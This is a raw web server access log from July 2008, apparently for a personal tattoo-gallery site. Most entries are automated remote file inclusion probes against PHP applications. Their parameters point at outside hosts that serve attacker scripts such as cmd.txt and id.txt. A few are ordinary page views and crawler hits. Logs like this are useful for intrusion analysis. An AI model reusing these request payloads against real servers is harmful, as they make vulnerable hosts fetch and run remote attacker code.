81.198.180.10 - - [30/Jul/2008:19:58:23 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
81.198.180.10 - - [30/Jul/2008:19:58:24 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
63.208.74.34 - - [30/Jul/2008:19:58:32 -0500] "GET /logs/allinurl:mod.php?mod=siteinfo&id=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
63.208.74.34 - - [30/Jul/2008:19:58:32 -0500] "GET /allinurl:mod.php?mod=siteinfo&id=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
62.65.34.76 - - [30/Jul/2008:19:58:50 -0500] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://www.klaus-schumacher.de/cmd.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
62.65.34.76 - - [30/Jul/2008:19:58:50 -0500] "GET /inc/functions.inc.php?config[ppa_root_path]=http://www.klaus-schumacher.de/cmd.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
67.77.184.232 - - [30/Jul/2008:19:59:41 -0500] "GET /logs/allinurl:mod.php?mod=siteinfo&id=http://69.13.92.203/sistem.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
67.77.184.232 - - [30/Jul/2008:19:59:42 -0500] "GET /allinurl:mod.php?mod=siteinfo&id=http://69.13.92.203/sistem.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
58.65.228.5 - - [30/Jul/2008:20:00:51 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.apnic.net/index.html? HTTP/1.0" 404 289 "-""Mozilla/5.0"
58.65.228.5 - - [30/Jul/2008:20:02:03 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 318 "-""Mozilla/5.0"
85.10.128.148 - - [30/Jul/2008:20:02:42 -0500] "GET /logs//home.php?action=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.10.128.148 - - [30/Jul/2008:20:02:42 -0500] "GET //home.php?action=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.234.133.173 - - [30/Jul/2008:20:02:50 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://artyficio.com/new/id.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
85.234.133.173 - - [30/Jul/2008:20:02:50 -0500] "GET //modules/xfsection/modify.php?dir_module=http://artyficio.com/new/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
72.243.169.10 - - [30/Jul/2008:20:03:59 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
72.243.169.10 - - [30/Jul/2008:20:03:59 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
72.243.169.10 - - [30/Jul/2008:20:03:59 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
208.98.1.100 - - [30/Jul/2008:20:04:05 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
208.98.1.100 - - [30/Jul/2008:20:04:05 -0500] "GET //e404.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
201.130.79.132 - - [30/Jul/2008:20:04:09 -0500] "GET /logs//tools/send_reminders.php?noSet=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:20:04:09 -0500] "GET //tools/send_reminders.php?noSet=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
200.146.61.130 - - [30/Jul/2008:20:04:39 -0500] "GET //?path%5Bdocroot%5D=http://sujianto.com/id.txt%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:20:04:40 -0500] "GET /logs//?path%5Bdocroot%5D=http://sujianto.com/id.txt%0D?? HTTP/1.1" 200 93420 "-""libwww-perl/5.79"
87.118.98.3 - - [30/Jul/2008:20:05:12 -0500] "GET /logs//tools/send_reminders.php?noSet=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
87.118.98.3 - - [30/Jul/2008:20:05:12 -0500] "GET //tools/send_reminders.php?noSet=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
206.130.11.80 - - [30/Jul/2008:20:06:10 -0500] "GET /logs/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.79"
206.130.11.80 - - [30/Jul/2008:20:06:10 -0500] "GET /vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:20:08:33 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.adoradores.kit.net/general? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:20:08:34 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.adoradores.kit.net/general? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:20:08:35 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.adoradores.kit.net/general? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
85.234.133.173 - - [30/Jul/2008:20:09:26 -0500] "GET /logs//citywriter/head.php?path=http://artyficio.com/new/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
85.234.133.173 - - [30/Jul/2008:20:09:26 -0500] "GET //citywriter/head.php?path=http://artyficio.com/new/id.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
85.214.59.54 - - [30/Jul/2008:20:10:10 -0500] "GET /logs/access_log.1213315200/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
85.214.59.54 - - [30/Jul/2008:20:10:11 -0500] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
85.214.59.54 - - [30/Jul/2008:20:10:11 -0500] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
190.81.184.98 - - [30/Jul/2008:20:10:40 -0500] "GET /logs/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
190.81.184.98 - - [30/Jul/2008:20:10:40 -0500] "GET /vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
81.198.180.10 - - [30/Jul/2008:20:11:04 -0500] "GET //?path%5Bdocroot%5D=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
81.198.180.10 - - [30/Jul/2008:20:11:04 -0500] "GET /logs//?path%5Bdocroot%5D=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 200 85865 "-""libwww-perl/5.805"
85.234.133.173 - - [30/Jul/2008:20:11:19 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
85.234.133.173 - - [30/Jul/2008:20:11:19 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
81.198.180.10 - - [30/Jul/2008:20:11:34 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
81.198.180.10 - - [30/Jul/2008:20:11:35 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
81.198.180.10 - - [30/Jul/2008:20:11:36 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
63.208.74.34 - - [30/Jul/2008:20:11:46 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://69.13.92.203/sistem.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
63.208.74.34 - - [30/Jul/2008:20:11:46 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://69.13.92.203/sistem.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
209.90.77.31 - - [30/Jul/2008:20:12:27 -0500] "GET //?path%5Bdocroot%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
209.90.77.31 - - [30/Jul/2008:20:12:28 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 93420 "-""libwww-perl/5.810"
63.208.74.34 - - [30/Jul/2008:20:12:57 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
63.208.74.34 - - [30/Jul/2008:20:12:57 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
221.144.12.141 - - [30/Jul/2008:20:13:07 -0500] "GET /logs/access_log.1212883200//config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
221.144.12.141 - - [30/Jul/2008:20:13:08 -0500] "GET //config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
221.144.12.141 - - [30/Jul/2008:20:13:08 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
67.77.184.232 - - [30/Jul/2008:20:13:14 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://69.13.92.203/sistem.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
67.77.184.232 - - [30/Jul/2008:20:13:14 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://69.13.92.203/sistem.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
67.77.184.232 - - [30/Jul/2008:20:13:18 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
67.77.184.232 - - [30/Jul/2008:20:13:18 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
221.144.12.141 - - [30/Jul/2008:20:13:35 -0500] "GET /logs/access_log.1214438400//config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
209.90.77.31 - - [30/Jul/2008:20:14:10 -0500] "GET //?path%5Bdocroot%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
209.90.77.31 - - [30/Jul/2008:20:14:10 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 93420 "-""libwww-perl/5.810"
207.44.234.103 - - [30/Jul/2008:20:14:25 -0500] "GET /logs//include/lib.inc.php?site_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
207.44.234.103 - - [30/Jul/2008:20:14:25 -0500] "GET //include/lib.inc.php?site_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
74.54.108.98 - - [30/Jul/2008:20:14:39 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
74.54.108.98 - - [30/Jul/2008:20:14:39 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
70.84.182.98 - - [30/Jul/2008:20:14:44 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
70.84.182.98 - - [30/Jul/2008:20:14:44 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
70.84.182.98 - - [30/Jul/2008:20:14:44 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
70.84.182.98 - - [30/Jul/2008:20:14:45 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.54.108.98 - - [30/Jul/2008:20:14:52 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
74.54.108.98 - - [30/Jul/2008:20:14:52 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
207.210.89.58 - - [30/Jul/2008:20:15:41 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
207.210.89.58 - - [30/Jul/2008:20:15:41 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
201.130.79.130 - - [30/Jul/2008:20:15:48 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
201.130.79.130 - - [30/Jul/2008:20:15:48 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
201.130.79.130 - - [30/Jul/2008:20:15:52 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
201.130.79.130 - - [30/Jul/2008:20:15:52 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.19.204.226 - - [30/Jul/2008:20:16:05 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
67.19.204.226 - - [30/Jul/2008:20:16:05 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
58.65.228.5 - - [30/Jul/2008:20:16:50 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.apnic.net/index.html? HTTP/1.0" 404 311 "-""Mozilla/5.0"
58.65.228.5 - - [30/Jul/2008:20:18:44 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 318 "-""Mozilla/5.0"
58.65.228.5 - - [30/Jul/2008:20:18:44 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 318 "-""Mozilla/5.0"
58.65.228.5 - - [30/Jul/2008:20:18:45 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 313 "-""Mozilla/5.0"
58.65.228.5 - - [30/Jul/2008:20:18:45 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.apnic.net/index.html? HTTP/1.0" 404 313 "-""Mozilla/5.0"
81.198.180.10 - - [30/Jul/2008:20:19:15 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
12.196.98.16 - - [30/Jul/2008:20:19:17 -0500] "GET /logs//tools/send_reminders.php?includedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 302 "-""libwww-perl/5.53"
83.12.119.178 - - [30/Jul/2008:20:19:20 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
83.12.119.178 - - [30/Jul/2008:20:19:23 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
12.196.98.16 - - [30/Jul/2008:20:19:25 -0500] "GET //tools/send_reminders.php?includedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 297 "-""libwww-perl/5.53"
83.12.119.178 - - [30/Jul/2008:20:19:29 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
83.12.119.178 - - [30/Jul/2008:20:19:32 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
89.218.85.18 - - [30/Jul/2008:20:19:54 -0500] "GET /logs/access_log.1214438400//?path%5Bdocroot%5D=http://macguru.us/guild/forum/images/icons/tools/sistem.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.218.85.18 - - [30/Jul/2008:20:19:54 -0500] "GET //?path%5Bdocroot%5D=http://macguru.us/guild/forum/images/icons/tools/sistem.gif? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.218.85.18 - - [30/Jul/2008:20:19:56 -0500] "GET /logs//?path%5Bdocroot%5D=http://macguru.us/guild/forum/images/icons/tools/sistem.gif? HTTP/1.1" 200 93420 "-""libwww-perl/5.805"
85.214.41.164 - - [30/Jul/2008:20:20:34 -0500] "GET /logs/errors.php?error=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.214.41.164 - - [30/Jul/2008:20:20:35 -0500] "GET /errors.php?error=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
195.42.160.22 - - [30/Jul/2008:20:21:12 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
195.42.160.22 - - [30/Jul/2008:20:21:12 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
72.243.169.10 - - [30/Jul/2008:20:22:27 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
72.243.169.10 - - [30/Jul/2008:20:22:28 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
72.243.169.10 - - [30/Jul/2008:20:22:28 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
72.243.169.10 - - [30/Jul/2008:20:22:30 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
74.54.108.98 - - [30/Jul/2008:20:23:22 -0500] "GET /logs/errors.php?error=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.54.108.98 - - [30/Jul/2008:20:23:22 -0500] "GET /errors.php?error=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.54.108.98 - - [30/Jul/2008:20:23:40 -0500] "GET /logs/access_log.1212278400/errors.php?error=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.234.133.173 - - [30/Jul/2008:20:23:51 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://artyficio.com/new/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
85.234.133.173 - - [30/Jul/2008:20:23:51 -0500] "GET //inc/download_center_lite.inc.php?script_root=http://artyficio.com/new/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
17.255.241.38 - - [30/Jul/2008:20:24:05 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://answers.yahoo.com/question/index?qid=20070729234637AARHCDH""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
17.255.241.38 - - [30/Jul/2008:20:24:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
17.255.241.38 - - [30/Jul/2008:20:24:06 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
17.255.241.38 - - [30/Jul/2008:20:24:06 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
195.42.160.22 - - [30/Jul/2008:20:24:12 -0500] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
195.42.160.22 - - [30/Jul/2008:20:24:12 -0500] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
17.255.241.38 - - [30/Jul/2008:20:24:20 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
17.255.241.38 - - [30/Jul/2008:20:24:20 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
17.255.241.38 - - [30/Jul/2008:20:24:20 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
17.255.241.38 - - [30/Jul/2008:20:24:20 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
17.255.241.38 - - [30/Jul/2008:20:24:20 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
17.255.241.38 - - [30/Jul/2008:20:24:20 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
17.255.241.38 - - [30/Jul/2008:20:24:21 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
17.255.241.38 - - [30/Jul/2008:20:24:21 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
17.255.241.38 - - [30/Jul/2008:20:24:21 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
17.255.241.38 - - [30/Jul/2008:20:24:21 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
17.255.241.38 - - [30/Jul/2008:20:24:23 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
12.196.98.16 - - [30/Jul/2008:20:24:29 -0500] "GET /logs//tools/send_reminders.php?includedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 302 "-""libwww-perl/5.53"
12.196.98.16 - - [30/Jul/2008:20:24:32 -0500] "GET //tools/send_reminders.php?includedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 297 "-""libwww-perl/5.53"
74.6.18.231 - - [30/Jul/2008:20:24:41 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.231 - - [30/Jul/2008:20:24:41 -0500] "GET /logs/access_log.1201392000 HTTP/1.0" 200 132965 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.97.0.11 - - [30/Jul/2008:20:24:44 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
